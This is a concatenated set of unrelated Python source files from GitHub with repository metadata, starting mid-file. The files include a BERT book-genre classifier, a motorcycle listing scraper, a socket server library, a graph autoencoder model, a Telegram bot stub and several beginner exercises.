data_shuffled, test_size=0.3, random_state=42
) # 分割成训练集和测试集
K_FOLDS = 6 # K折训练
# K折训练的模型
kf = StratifiedKFold(n_splits=K_FOLDS, shuffle=True, random_state=42)
# ***************下载模型*****************
if 1:# 下载模型
print("下载模型中...")
tokenizer = AutoTokenizer.from_pretrained("bert-base-cased")
tokenizer.save_pretrained("../model/Tokenizer")
bert = AutoModelForMaskedLM.from_pretrained("bert-base-cased")
bert.save_pretrained("../model/BERT_ROW")
bert_basic = BertModel.from_pretrained("bert-base-cased")
bert_basic.save_pretrained("../model/BERT_BASIC")
print("!模型下载结束")
if 0:#
print("模型加载中...")
tokenizer = AutoTokenizer.from_pretrained("../model/Tokenizer")
bert = AutoModelForMaskedLM.from_pretrained("../model/BERT_ROW")
bert_basic = BertModel.from_pretrained("../model/BERT_BASIC")
print("模型加载完毕...")
# ***************常量和定义的类与函数************
LABELS = {
"Literature & Fiction": 0,
"Animals": 1,
"Growing Up & Facts of Life": 2,
"Humor": 3,
"Cars, Trains & Things That Go": 4,
"Fairy Tales, Folk Tales & Myths": 5,
"Activities, Crafts & Games": 6,
"Science Fiction & Fantasy": 7,
"Classics": 8,
"Mysteries & Detectives": 9,
"Action & Adventure": 10,
"Geography & Cultures": 11,
"Education & Reference": 12,
"Arts, Music & Photography": 13,
"Holidays & Celebrations": 14,
"Science, Nature & How It Works": 15,
"Early Learning": 16,
"Biographies": 17,
"History": 18,
"Children's Cookbooks": 19,
"Religions": 20,
"Sports & Outdoors": 21,
"Comics & Graphic Novels": 22,
"Computers & Technology": 23,
}
# 日志文件输出目录
logging.basicConfig(filename="../log/train.log", level=logging.INFO)
# *** 封装类 方便数据类型转换 ***************
class Dataset(torch.utils.data.Dataset):
def __init__(self, df):
self.labels = [LABELS[label] for label in df["category"]]
self.texts = [
tokenizer(
text,
padding="max_length",
max_length=512,
truncation=True,
return_tensors="pt",
)
for text in df["text"]
]
def classes(self):
return self.labels
def __len__(self):
return len(self.labels)
def get_batch_labels(self, idx):
# Fetch a batch of labels
return np.array(self.labels[idx])
def get_batch_texts(self, idx):
# Fetch a batch of inputs
return self.texts[idx]
def __getitem__(self, idx):
batch_texts = self.get_batch_texts(idx)
batch_y = self.get_batch_labels(idx)
return batch_texts, batch_y
class BertClassifier(nn.Module):
def __init__(self, dropout=0.5):
super(BertClassifier, self).__init__()
self.bert = bert_basic
self.dropout = nn.Dropout(dropout)
self.linear = nn.Linear(768, 24)
self.relu = nn.ReLU()
def forward(self, input_id, mask):
_, pooled_output = self.bert(
input_ids=input_id, attention_mask=mask, return_dict=False
)
dropout_output = self.dropout(pooled_output)
linear_output = self.linear(dropout_output)
final_layer = self.relu(linear_output)
return final_layer
def train(model, train_data, val_data, learning_rate, epochs):
# 判断是否使用GPU
use_cuda = torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
# 通过Dataset类获取训练和验证集
train, val = Dataset(train_data), Dataset(val_data)
# DataLoader根据batch_size获取数据,训练时选择打乱样本
train_dataloader = torch.utils.data.DataLoader(train, batch_size=8, shuffle=True)
val_dataloader = torch.utils.data.DataLoader(val, batch_size=8)
# 定义损失函数和优化器
criterion = nn.CrossEntropyLoss()
optimizer = Adam(model.parameters(), lr=learning_rate)
if use_cuda:
print("使用gpu")
model = model.to(device)
criterion = criterion.to(device)
# 开始进入训练循环
for epoch_num in range(epochs):
# 定义两个变量,用于存储训练集的准确率和损失
total_acc_train = 0
total_loss_train = 0
for train_input, train_label in tqdm(train_dataloader):
train_label = train_label.to(device)
train_label = train_label.to(torch.long)
mask = train_input["attention_mask"].to(device)
input_id = train_input["input_ids"].squeeze(1).to(device)
# 通过模型得到输出
output = model(input_id, mask)
# 计算损失
batch_loss = criterion(output, train_label)
total_loss_train += batch_loss.item()
# 计算精度
acc = (output.argmax(dim=1) == train_label).sum().item()
total_acc_train += acc
# 模型更新
model.zero_grad()
batch_loss.backward()
optimizer.step()
# ------ 验证模型 -----------
# 定义两个变量,用于存储验证集的准确率和损失
total_acc_val = 0
total_loss_val = 0
# 不需要计算梯度
with torch.no_grad():
# 循环获取数据集,并用训练好的模型进行验证
for val_input, val_label in val_dataloader:
val_label = val_label.to(device)
val_label = val_label.to(torch.long)
mask = val_input["attention_mask"].to(device)
input_id = val_input["input_ids"].squeeze(1).to(device)
output = model(input_id, mask)
batch_loss = criterion(output, val_label)
total_loss_val += batch_loss.item()
acc = (output.argmax(dim=1) == val_label).sum().item()
total_acc_val += acc
logging.info(
"\n| Epochs: %d \n| Train Loss: %.3f \n| Train Accuracy: %.3f \n| Val Loss: %.3f \n| Val Accuracy: %.3f \n",
epoch_num + 1,
total_loss_train / len(train_data),
total_acc_train / len(train_data),
total_loss_val / len(val_data),
total_acc_val / len(val_data),
)
# ************** 运行部分 ********************
model = BertClassifier()
model.load_state_dict(torch.load("../model/BERT-1"))
learning_rate = 5e-6 # 设置学习率
epochs = 1 # 设置训练轮数
train(model, train_data, test_data, learning_rate, epochs)
torch.save(model.state_dict(), "../model/BERT-1")
|
zzhaire/dig-dig-books
|
code/train.py
|
train.py
|
py
| 7,354 |
python
|
en
|
code
| 1 |
github-code
|
6
|
36151078302
|
import sqlite3 as lite
import sys
from bs4 import BeautifulSoup
import requests
import re
def site_parsing():
max_page = 10
pages = []
id_n = 0
id_n_price = 0
for x in range(1, max_page + 1):
pages.append(requests.get('https://moto.drom.ru/sale/+/Harley-Davidson+Softail/'))
for n in pages:
soup = BeautifulSoup(n.text, 'html.parser')
moto_name = soup.find_all('a', class_="bulletinLink bull-item__self-link auto-shy")
for rev in moto_name:
id_n += 1
a = str(rev.text)
moto = re.split(r',', a)
moto_name_s = str(moto[0])
moto_year = re.sub(r'[ ]', '', moto[1])
moto_year_s = int(moto_year)
cur.execute("INSERT INTO moto VALUES(?,?,?)", (id_n, moto_name_s, moto_year_s))
price = soup.find_all('span', class_='price-block__price')
pattern = r'(\d{1}\s\d{3}\s\d{3})|(\d{3}\s\d{3})'
for rev in price:
id_n_price += 1
price_str = re.findall(pattern, rev.text)
price_str = str(price_str)
price_str = price_str.replace('\\xa0', '')
price_str = re.sub(r"[\]['(),\s]", '', price_str)
price_int = int(price_str)
cur.execute("INSERT INTO moto_price VALUES(?,?)", (id_n_price, price_int))
connect = None
try:
connect = lite.connect('motos.db')
cur = connect.cursor()
cur.execute("CREATE TABLE moto(id INT, moto TEXT, year INT)")
cur.execute("CREATE TABLE moto_price(id INT, price INT)")
site_parsing()
except lite.Error as e:
print(f"Error {e.args[0]}:")
sys.exit()
with connect:
cur = connect.cursor()
rows_join = f'SELECT * FROM moto JOIN moto_price ON moto.id = moto_price.id'
cur.execute(rows_join)
rows = cur.fetchall()
for row in rows:
print(row)
connect.close()
|
TatyanaKuleshova/lesson19-project-
|
db.py
|
db.py
|
py
| 1,878 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21545803934
|
# num = 100
#
# while num > 0:
# print(num)
# num = num + 1
# num = 1
# while num <= 100:
# if num % 2 == 0:
# print(num)
# num += 1
#
# num = 1
# son = 0
# while num <= 100:
# if num % 4 == 0:
# son += 1
# num += 1
#
# print(son)
import random
num = 1
nums = []
while num <= 10:
random_number = random.randint(1, 50)
if random_number % 2 == 1:
nums.append(random_number)
num += 1
print(nums)
|
Sanjarbek-AI/Python-688
|
Lesson-10/dars.py
|
dars.py
|
py
| 462 |
python
|
en
|
code
| 0 |
github-code
|
6
|
23948038488
|
import torch.nn as nn
import torch_geometric.nn as pyg_nn
class iVGAE_Encoder(nn.Module):
def __init__(self, in_channels, hidden_channels, out_channels):
super().__init__()
self.conv0 = pyg_nn.GCNConv(in_channels, hidden_channels)
self.conv1 = pyg_nn.GCNConv(hidden_channels, hidden_channels)
self.lin_mean = nn.Linear(hidden_channels, out_channels)
self.lin_logstd = nn.Linear(hidden_channels, out_channels)
def forward(self, x, edge_index):
h = self.conv0(x, edge_index)
h = nn.ReLU()(h)
h = self.conv1(h, edge_index)
h = nn.ReLU()(h)
mean = self.lin_mean(h)
logstd = self.lin_logstd(h)
return mean, logstd
class iVGAE_Decoder(nn.Module):
def __init__(self, in_channels, hidden_channels, out_channels):
super().__init__()
self.conv0 = pyg_nn.GCNConv(in_channels, hidden_channels)
self.conv1 = pyg_nn.GCNConv(hidden_channels, hidden_channels)
self.linear = nn.Linear(hidden_channels, out_channels)
def forward(self, z, edge_index, sigmoid=True):
h = self.conv0(z, edge_index)
h = nn.ReLU()(h)
h = self.conv1(h, edge_index)
h = nn.ReLU()(h)
out = self.linear(h)
if sigmoid:
out = nn.Sigmoid()(out)
return out
class iVGAE(pyg_nn.VGAE):
def __init__(self, encoder, decoder):
super().__init__(encoder, decoder)
def decode(self, z, pos_edge_index):
x_gen = self.decoder(z, pos_edge_index)
return x_gen
def forward(self, x, pos_edge_index):
z = self.encode(x, pos_edge_index)
x_gen = self.decode(z, pos_edge_index)
return x_gen, z
|
DavidCarlyn/iVGAE
|
models.py
|
models.py
|
py
| 1,705 |
python
|
en
|
code
| 0 |
github-code
|
6
|
25147617203
|
import errno
import logging as _logging
import socket
import socketserver
import threading
import time
from napalm import utils
# Log
logging = _logging.getLogger("SERVER")
# Temp
# utils.default_logging_setup()
try:
from twisted.internet import reactor
from twisted.internet.protocol import connectionDone, Protocol, ServerFactory
from twisted.protocols.basic import LineReceiver
except ImportError:
logging.warning("There is no Twisted module!")
"""
Conventions:
"raw" - means data with delimiters, not splitted yet.
"data" - str data.
"data_bytes" - bytes data.
Servers and clients operate only with bytes. Protocol converts bytes to str and wise versa.
"""
# Common
class Config:
DELIMITER = b"\x00"
# 1200 - the most optimal max message size to fit IP(?) frame when using TCP
RECV_SIZE = 1200 # 1024 # 4096
@property
def host(self):
return self._host
@property
def port(self):
return self._port
def __init__(self, host="", port=0, protocol_class=None):
self._host = host
self._port = port
if protocol_class:
self.protocol_class = protocol_class
class ServerConfig(Config):
logging = None
pass
class ProtocolFactory:
"""
Single point of creating protocols to be used by any server type.
"""
def __init__(self, config, app=None):
self.config = config
self.app = app
self.protocol_class = config.protocol_class if config and hasattr(config, "protocol_class") else None
self.logging = logging if self.protocol_class and self.protocol_class.is_server_protocol else \
_logging.getLogger("CLIENT")
def dispose(self):
self.logging.debug("ProtocolFactory dispose")
self.config = None
self.app = None
self.protocol_class = None
# self.logging = None
def create(self, send_bytes_method, close_connection_method, address):
if not self.protocol_class:
return None
protocol = self.protocol_class(send_bytes_method, close_connection_method, address, self.config, self.app)
self.logging.debug("ProtocolFactory create new protocol: %s for address: %s", protocol, address)
return protocol
class AbstractServer:
def __init__(self, config, app=None):
self.config = config
self.protocol_factory = ProtocolFactory(config, app)
logging.debug("Server created. %s", self)
def dispose(self):
logging.debug("Server disposing...")
self.stop()
if self.protocol_factory:
self.protocol_factory.dispose()
self.protocol_factory = None
self.config = None
logging.debug("Server disposed")
def start(self):
raise NotImplemented
def stop(self):
raise NotImplemented
# Twisted
# TODO try to rename all protocol to protocol (all depend on TwistedHandler)
class TwistedHandler(LineReceiver):
delimiter = b"\x00"
protocol = None
def connectionMade(self):
# Config
self.delimiter = self.factory.config.DELIMITER
# Create app protocol
address = self.transport.getPeer()
self.protocol = self.factory.protocol_factory.create(self.sendLine, self.transport.loseConnection,
(address.host, address.port))
logging.debug("connectionMade for %s protocol: %s", address, self.protocol)
def rawDataReceived(self, data):
# Not used while in line_mode
pass
def lineReceived(self, line):
# logging.debug("dataReceived for %s line: %s", self.protocol, line)
if line:
self.protocol.process_bytes_list((line,))
# def sendLine(self, line):
# logging.debug("sendData for %s line: %s", self.protocol, line)
# super().sendLine(line)
def connectionLost(self, reason=connectionDone):
logging.debug("connectionLost for %s reason: %s", self.protocol, reason)
self.protocol.dispose()
self.protocol = None
class TwistedTCPServer(AbstractServer):
factory = None
port = None
def __init__(self, config, app=None):
super().__init__(config, app)
self.factory = ServerFactory()
self.factory.protocol = TwistedHandler
# Custom references
self.factory.config = config
self.factory.protocol_factory = self.protocol_factory
self.started = False
self.__started_lock = threading.RLock()
def dispose(self):
super().dispose()
if self.factory:
self.factory.config = None
self.factory.protocol = None
self.factory.protocol_factory = None
self.factory = None
def start(self):
self.__started_lock.acquire()
if self.started:
logging.warning("Server is already running. address: %s", (self.config.host, self.config.port))
self.__started_lock.release()
return
logging.debug("Server starting... address: %s", (self.config.host, self.config.port))
self.started = True
self.__started_lock.release()
self.port = reactor.listenTCP(self.config.port, self.factory)
if not reactor.running:
reactor.run()
logging.debug("Server started")
def stop(self):
self.__started_lock.acquire()
if not self.started:
logging.warning("Server is not running. address: %s", (self.config.host, self.config.port))
self.__started_lock.release()
return
logging.debug("Server stopping...")
self.started = False
self.__started_lock.release()
if self.port:
# deferred = self.port.stopListening()
# if deferred:
# event = threading.Event()
# event.clear()
#
# def event_set():
# print("Waiting finished")
# event.set()
# deferred.addCallback(event_set)
# print("Waiting while listening stopping...", deferred)
# event.wait()
# print("Listening stopped")
self.port.loseConnection()
try:
self.port.connectionLost(None)
except Exception as error:
# Bug in Twisted: sometimes AttributeError ('Port' object has no attribute 'socket') occurs
# print("ERROR", error)
pass
self.port = None
# -reactor.stop()
# reactor.crash()
logging.debug("Server stopped")
# print("Press Enter to exit...")
# input()
# # Needed to save lobby state using atexit.register() in app
# sys.exit()
# Threaded
class ThreadedTCPHandler(socketserver.BaseRequestHandler):
# static
abort = False
buffer_bytes = b""
# is_first = True
config = None
protocol = None
def setup(self):
threading.current_thread().name += "-srv-handler"
self.config = self.server.config
self.protocol = self.server.protocol_factory.create(self.send_bytes, self.request.close,
self.client_address)
logging.debug("connectionMade for %s protocol: %s", self.client_address, self.protocol)
def finish(self):
logging.debug("connectionLost for %s", self.protocol)
self.protocol.dispose()
self.protocol = None
self.config = None
def send_bytes(self, data_bytes):
# logging.debug("sendData for %s line: %s", self.protocol, data_bytes)
self.request.sendall(data_bytes + self.config.DELIMITER)
def handle(self):
while not self.server.abort:
# Read
is_data = True
data_bytes = None
while not self.server.abort and is_data and self.config.DELIMITER not in self.buffer_bytes:
try:
data_bytes = self.request.recv(self.config.RECV_SIZE)
is_data = bool(data_bytes)
self.buffer_bytes += data_bytes
except socket.error as error:
# Note: current buffer won't be processed, but it usually empty in such cases
logging.debug(" (connectionLost (abort) for %s reason: %s)", self.protocol, error)
return
# Parse bytes
# b"command1##command2##\x00command3##\x00" -> [b"command1##command2##", b"command3##", b""]
# b"1||param||##5||param||##\x0010||param||##\x00" ->
# [b"1||param||##5||param||##", b"10||param||##", b""]
if self.buffer_bytes:
# print("TEMP SERVER config:", self.server and self.config)
data_bytes_list = self.buffer_bytes.split(self.config.DELIMITER)
self.buffer_bytes = data_bytes_list.pop()
# Process
try:
# (Try-except: because send method could be invoked during processing)
if self.protocol and data_bytes_list:
self.protocol.process_bytes_list(data_bytes_list)
# (Don't use socket.error because it causes StopIteration, which would not be caught)
# except socket.error as error:
except Exception as error:
logging.debug(" (connectionLost for %s reason: %s)", self.protocol, error)
return
if not data_bytes:
if not self.server.abort:
reason = "(Empty data received: %s)" % data_bytes
logging.debug(" (connectionLost for %s reason: %s)", self.protocol, reason)
return
class ThreadedTCPServer(AbstractServer):
server = None
def __init__(self, config, app=None):
super().__init__(config, app)
self.started = False
self.__started_lock = threading.RLock()
self.__shutdown_event = threading.Event()
self.__shutdown_event.set()
# def dispose(self):
# super().dispose()
def start(self):
if not self.config:
logging.error("Server is not initialized")
return
self.__started_lock.acquire()
if self.started:
logging.warning("Server is already running. address: %s", (self.config.host, self.config.port))
self.__started_lock.release()
return
# Create and start server
address = (self.config.host, self.config.port)
logging.debug("Server starting... address: %s", address)
self.started = True
self.__started_lock.release()
self.server = socketserver.ThreadingTCPServer(address, ThreadedTCPHandler)
self.server.protocol_factory = self.protocol_factory
self.server.config = self.config
self.server.abort = False
logging.debug("Server started")
self.__shutdown_event.clear()
try:
self.server.serve_forever()
except KeyboardInterrupt as error:
logging.info("^C KeyboardInterrupt", error)
# Here we shutting down the server
logging.debug("Server shutting down...")
# (Abort other threads)
self.server.abort = True
self.server.server_close()
self.server.protocol_factory = None
self.server.config = None
self.server = None
logging.debug("Server shut down")
self.__shutdown_event.set()
# print("Press Enter to exit...")
# input()
# # Needed to save lobby state using atexit.register() in app
# sys.exit()
def stop(self):
self.__started_lock.acquire()
if not self.started:
logging.warning("Server is not running. address: %s", (self.config.host, self.config.port))
self.__started_lock.release()
return
# Preventing
logging.debug("Server stopping... address: %s", (self.config.host, self.config.port))
self.started = False
self.__started_lock.release()
t = time.time()
self.server.shutdown()
self.__shutdown_event.wait()
logging.debug("Server stopped in %f sec (95%% of time is exiting from serve_forever())", time.time() - t)
# Non-blocking
class NonBlockingTCPServer(AbstractServer):
_sock = None
def __init__(self, config, app=None):
super().__init__(config, app)
# (Needed for walking through all connections on each tick and receiving available data)
self._protocol_list = []
self._request_by_protocol = {}
self._buffer_by_protocol = {}
self._abort = False
self.started = False
self.__started_lock = threading.RLock()
self.__shutdown_event = threading.Event()
self.__shutdown_event.set()
def start(self):
if not self.config:
logging.warning("Server is not initialized")
return
address = (self.config.host, self.config.port)
logging.debug("Server starting... address: %s", address)
self.__started_lock.acquire()
if self.started:
logging.warning("Server is already running. address: %s", (self.config.host, self.config.port))
self.__started_lock.release()
return
self.started = True
self.__started_lock.release()
# (If restarting)
self._abort = False
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._sock.bind(address)
self._sock.listen()
self._sock.setblocking(0)
logging.debug("Server started")
self.__shutdown_event.clear()
try:
self._workflow(self._sock)
except KeyboardInterrupt as error:
logging.debug("^C KeyboardInterrupt %s", error)
logging.debug("Server shutting down...")
# self._abort = True
try:
self._sock.shutdown(socket.SHUT_RDWR)
except socket.error as error:
logging.error("Error while shutting down: %s", error)
self._sock.close()
self._sock = None
# (list() needed to make a copy)
for protocol in list(self._protocol_list):
protocol.dispose()
self._protocol_list.clear()
self._request_by_protocol.clear()
self._buffer_by_protocol.clear()
logging.debug("Server shut down")
# logging.debug("Server stopped")
self.__shutdown_event.set()
# (For standalone. Bad for tests)
# print("Press Enter to exit...")
# input()
# # Needed to save lobby state using atexit.register() in app
# sys.exit()
def stop(self):
logging.debug("Server stopping...")
self.__started_lock.acquire()
if not self.started:
logging.warning("Server is not running. address: %s", (self.config.host, self.config.port))
self.__started_lock.release()
return
# If was started, but yet is not stopping
self.started = False
self.__started_lock.release()
self._abort = True
self.__shutdown_event.wait()
logging.debug("Server stopped")
def _process_disconnect(self, protocol, error):
logging.debug("connectionLost for %s reason: %s", protocol, error)
protocol.dispose()
self._protocol_list.remove(protocol)
if protocol in list(self._request_by_protocol):
del self._request_by_protocol[protocol]
if protocol in list(self._buffer_by_protocol):
del self._buffer_by_protocol[protocol]
def _workflow(self, sock):
while not self._abort:
# print("SERVER. While...")
# Connect
request, address = None, None
try:
request, address = sock.accept()
# socket.error (real error is [WinError 10035])
except Exception as error:
# print("accept error:", error)
# There is no new connections - skip
pass
if request:
# New connection
def send_bytes(data_bytes):
# logging.debug("sendData for %s line: %s", self.protocol, data_bytes)
request.sendall(data_bytes + self.config.DELIMITER)
# Create protocol
protocol = self.protocol_factory.create(send_bytes, request.close, address)
logging.debug("connectionMade for %s protocol: %s", address, protocol)
self._protocol_list.append(protocol)
self._request_by_protocol[protocol] = request
# Walk through all connections looking for new data to receive
i = 0
for protocol in self._protocol_list:
i += 1
request = self._request_by_protocol[protocol]
# Read
buffer_bytes = self._buffer_by_protocol.get(self, b"")
is_data = True
data_bytes = None
while is_data:
try:
data_bytes = request.recv(self.config.RECV_SIZE)
is_data = bool(data_bytes)
buffer_bytes += data_bytes
# print("SERVER. recv data_bytes:", data_bytes, "buffer_bytes:", buffer_bytes)
# socket.error
except Exception as error:
# (break) is_data = False
# print("SERVER. Error (recv)", error)
if not hasattr(error, "errno") or error.errno != errno.EWOULDBLOCK:
self._process_disconnect(protocol, error)
# Process next connection for both disconnect and no data received now
break
if not data_bytes:
self._process_disconnect(protocol, "(Empty data received: %s)" % data_bytes)
if not buffer_bytes:
continue
# Parse bytes
data_bytes_list = buffer_bytes.split(self.config.DELIMITER)
self._buffer_by_protocol[self] = data_bytes_list.pop()
# Process
try:
# (Try-except: because send method could be invoked during processing)
if protocol and data_bytes_list:
logging.debug("dataReceived for %s line: %s", protocol, buffer_bytes)
protocol.process_bytes_list(data_bytes_list)
# socket.error
except Exception as error:
self._process_disconnect(protocol, error)
break
|
markelov-alex/py-sockets
|
napalm/socket/server.py
|
server.py
|
py
| 18,945 |
python
|
en
|
code
| 0 |
github-code
|
6
|
17283528585
|
from solver import Solver
from config import Config
if __name__ == '__main__':
cfg = Config()
cfg.data_dir = "/data/face/parsing/dataset/ibugmask_release"
cfg.model_args.backbone = "STDCNet1446"
cfg.model_args.pretrain_model = "snapshot/STDCNet1446_76.47.tar"
solver = Solver(cfg)
solver.sample(sample_dir="/data/face/parsing/dataset/testset_210720_aligned", result_folder="result")
|
killf/U2Net4FaceParsing
|
test.py
|
test.py
|
py
| 409 |
python
|
en
|
code
| 0 |
github-code
|
6
|
39046925212
|
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 11 10:48:58 2018
@author: Diogo
"""
from SQL_obj_new.DB_interaction_DDI_sql_new import _DB_interaction_DDI_SQL
class DB_interaction_DDI(object):
"""
This class treat the source that give the information about the DDI object has it exists in DB_interaction_DDI table database
By default, all FK are in the lasts positions in the parameters declaration
"""
def __init__(self, id_db_int_DBI = -1, designation_source = "", database_name = "INPH_proj"):
"""
Constructor of the DDI source data object. All the parameters have a default value
:param id_db_int_DBI: id of DDI interaction - -1 if unknown
:param designation_source: id of the domain A
:param database_name: name of the database. See Factory_databases_access
:type id_db_int_DBI: int - not required
:type designation_source: int - required
:type database_name: text - required
"""
self.id_db_int_DBI = id_db_int_DBI
self.designation_source = designation_source
self.database_name = database_name
def get_all_DDI_sources(self):
"""
return an array with all the DDI source in the database
:return: array of DDI source
:rtype: array(DB_interaction_DDI)
"""
listOfDomainsSources = []
sqlObj = _DB_interaction_DDI_SQL(db_name = self.database_name)
results = sqlObj.select_all_sources_DDI_name()
for element in results:
listOfDomainsSources.append(DB_interaction_DDI(element[0], element[1]))
return listOfDomainsSources
def create_DDI_source(self):
"""
Insert a DDI source in the database
The ddi interaction have a:
- designation of the source
:return: id of the DDI source and update the id of the object
:rtype int
"""
sqlObj = _DB_interaction_DDI_SQL(db_name = self.database_name)
value_interaction_id = sqlObj.insert_DDI_source_return_id(self.designation_source)
self.id_db_int_DBI = value_interaction_id
return value_interaction_id
def create_DDI_source_if_not_exists(self):
"""
Insert a DDI source in the database if not already exists
The ddi interaction have a:
- designation of the source
:return: id of the DDI source and update the id of the object
:rtype int
"""
sqlObj = _DB_interaction_DDI_SQL(db_name = self.database_name)
value_interaction_id = sqlObj.insert_DDI_source_return_id_if_not_exists(self.designation_source)
self.id_db_int_DBI = value_interaction_id
return value_interaction_id
|
diogo1790/inphinity
|
objects_new/DB_interaction_DDI_new.py
|
DB_interaction_DDI_new.py
|
py
| 2,715 |
python
|
en
|
code
| 0 |
github-code
|
6
|
33155203825
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-from telegram.ext import Updater, CommandHandler
from telegram.ext import Updater, CommandHandler
updater = Updater('TOKEN')
def start_method(bot, update):
bot.sendMessage(update.message.chat_id, "سلام")
start_command = CommandHandler('start', start_method)
updater.dispatcher.add_handler(start_command)
updater.start_polling()
# for exit
updater.idle()
|
rasoolhp/free-telegram-bot
|
bot.py
|
bot.py
|
py
| 412 |
python
|
en
|
code
| 5 |
github-code
|
6
|
17913448581
|
"""Made email unique
Revision ID: ff6f0a832e3a
Revises: 876813ef988d
Create Date: 2022-08-09 16:32:43.590993
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'ff6f0a832e3a'
down_revision = '876813ef988d'
branch_labels = None
depends_on = None
def upgrade() -> None:
# ### commands auto generated by Alembic - please adjust! ###
op.create_unique_constraint(None, 'users', ['email'])
# ### end Alembic commands ###
def downgrade() -> None:
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint(None, 'users', type_='unique')
# ### end Alembic commands ###
|
djangbahevans/wallet-clone
|
backend/alembic/versions/ff6f0a832e3a_made_email_unique.py
|
ff6f0a832e3a_made_email_unique.py
|
py
| 667 |
python
|
en
|
code
| 0 |
github-code
|
6
|
3148189147
|
# devuelve un string donde los caracteres consecutivos de S no se repitan más que R veces
def sin_repetidos(str,number):
cantidad = 0
final = ""
anterior = ""
for caracter in str:
cantidad = cantidad+1
if(caracter != anterior):
cantidad=1
anterior=caracter
if(cantidad <= number):
final = final + caracter
return final
|
jazz-bee/sin_repetidos
|
ejercicio.py
|
ejercicio.py
|
py
| 403 |
python
|
es
|
code
| 0 |
github-code
|
6
|
7002507231
|
import json
from .db_utils import conn as db_conn
from enum import Enum
class NotificationType(Enum):
questionEndorse = 'question_endorsed'
answerEndorse = 'answer_endorsed'
answerUser = 'answer_user'
answerSaved = 'answer_saved'
NOTIFICATION_TEXT_BY_TYPE = {
NotificationType.questionEndorse: "endorsed your question",
NotificationType.answerEndorse: "endorsed your answer",
NotificationType.answerUser: "answered your question",
NotificationType.answerSaved: "answered a question you saved"
}
DATA_FIELDS_BY_TYPE = {
NotificationType.questionEndorse: set(['question_id']),
NotificationType.answerEndorse: set(['question_id', 'answer_id']),
NotificationType.answerUser: set(['question_id', 'answer_id']),
NotificationType.answerSaved: set(['question_id', 'answer_id'])
}
def push_notification(user_id, notif_type, data):
cur = db_conn.cursor()
if set(data.keys()) != DATA_FIELDS_BY_TYPE[notif_type]:
raise ArgumentError("Invalid data fields for notification type {}; expected {}".format(data.keys(), DATA_FIELDS_BY_TYPE[notif_type]))
cur.execute("INSERT INTO notifications (user_id, type, data) VALUES (%s, %s, %s)", (user_id, notif_type.value, json.dumps(data)))
|
minupalaniappan/gradfire
|
daviscoursesearch/flaskapp/utils/notif_utils.py
|
notif_utils.py
|
py
| 1,239 |
python
|
en
|
code
| 12 |
github-code
|
6
|
35757262298
|
from clases import Automovil
# Obtener datos, mostrando los textos del ejemplo
def obtener_datos():
msg = [
'Inserte la marca del automóvil: ',
'Inserte el modelo: ',
'Inserte el número de ruedas: ',
'Inserte la velocidad en km/h: ',
'Inserte el cilindraje en cc: '
]
datos = []
for m in msg:
datos.append(input(m))
return datos
# Mostrando los textos del ejemplo
def main():
instancias = {}
# Pedir los datos y guardarlos
cantidad = int(input("Cuantos vehículos desea insertar: "))
for i in range(1,cantidad+1):
print(f"\nDatos del automóvil {i}")
instancias[i] = Automovil(*obtener_datos())
# Mostrar los datos
print("\nImprimiendo por pantalla los Vehículos:\n")
for n,veh in instancias.items():
print(f"Datos del automóvil {n}:", veh)
# Versión genérica, independiente de los nombres de atributos y la cantidad de estos
def main2():
instancias = {}
atributos = list(Automovil.__init__.__code__.co_varnames)[1:]
# Pedir los datos y guardarlos
cantidad = int(input("Cuantos vehículos desea insertar: "))
for i in range(1,cantidad+1):
print(f"\nDatos del automóvil {i}")
datos = []
for att in atributos:
datos.append(input(f"Inserte {att}: "))
instancias[i] = Automovil(*datos)
# Mostrar los datos
print("\nImprimiendo por pantalla los Vehículos:\n")
for n,veh in instancias.items():
print(f"Datos del automóvil {n}:", veh.get_str())
if __name__ == "__main__":
main()
print("\n\nAhora, versión genérica (independiente de los atributos)\n")
main2()
|
tiango-git/full-stack-mod4-eval
|
parte1/main.py
|
main.py
|
py
| 1,783 |
python
|
es
|
code
| 0 |
github-code
|
6
|
32174246789
|
from android.droidagent import DroidAdapter, DroidElement
from rpa import InputMethod
import time
'''
A sample can open contact book and search the phone number by specific name
'''
agent = DroidAdapter()
DroidElement.setAgent(agent)
person = 'Bart'
DroidElement().start('contacts')
time.sleep(1)
DroidElement('txt_contact_search').click()
DroidElement().typetext(person)
DroidElement('txt_contact_search_first').click()
phone = DroidElement('txt_contact_details').gettext()
print('%s\'Phone Number is %s'%(person, phone))
|
bartmao/pyRPA
|
samples/sample-andriod.py
|
sample-andriod.py
|
py
| 524 |
python
|
en
|
code
| 20 |
github-code
|
6
|
37682586689
|
"""
Challenge 18: Print the first 100 prime numbers
"""
import math
def isPrime(n) -> bool:
if n < 2:
return False
if n == 2:
return True
maxDiv = math.sqrt(n)
i = 2
while i <= maxDiv:
if n % i == 0:
return False
i += 1
return True
def printPrime(nPrimes):
n = 0
i = 2
while n < nPrimes:
if isPrime(i):
print(n, "--->", i)
n += 1
i += 1
# Driver Method
def main():
printPrime(100)
if __name__ == "__main__":
main()
|
mofirojean/50-Coding-Challenge
|
50 Coding Challenge Part I/Python/Challenge18.py
|
Challenge18.py
|
py
| 562 |
python
|
en
|
code
| 2 |
github-code
|
6
|
32672071641
|
"""Search: 'python filter one list based on another' to solve"""
import string
import unittest
if not hasattr(unittest.TestCase, 'assertCountEqual'):
unittest.TestCase.assertCountEqual = unittest.TestCase.assertItemsEqual #kinda like method_override in npm
def test_blah():
txt = ['I', 'like', 'to', 'eat', 'unhealthy', 'food', 'such', 'as', 'pizza', 'salad', 'and', 'popsicles']
blocked = ['unhealthy', 'pizza', 'cake']
assert redact_words(txt, blocked) == ['I', 'like', 'to', 'eat', 'food', 'such', 'as', 'salad', 'and', 'popsicles']
def redact_words(words, banned_words):
censored_ver = []
upper_bound = len(words) - 1
i = 0 #initialize counter
for word in words:
while i <= upper_bound:
if word != banned_words[i]:
# censored_ver.append(word)
i += 1
censored_ver.append(word)
return censored_ver
#welp, Lucia explained why I was getting an index error
#I'm using a counter based on WORDS array's length, to index in BANNED_WORDS array
#ofc i'm getting an index error.. facepalm!!
#thanks lucia!!
"""
Hooray pseudocode
Params: 2 arrays of strings
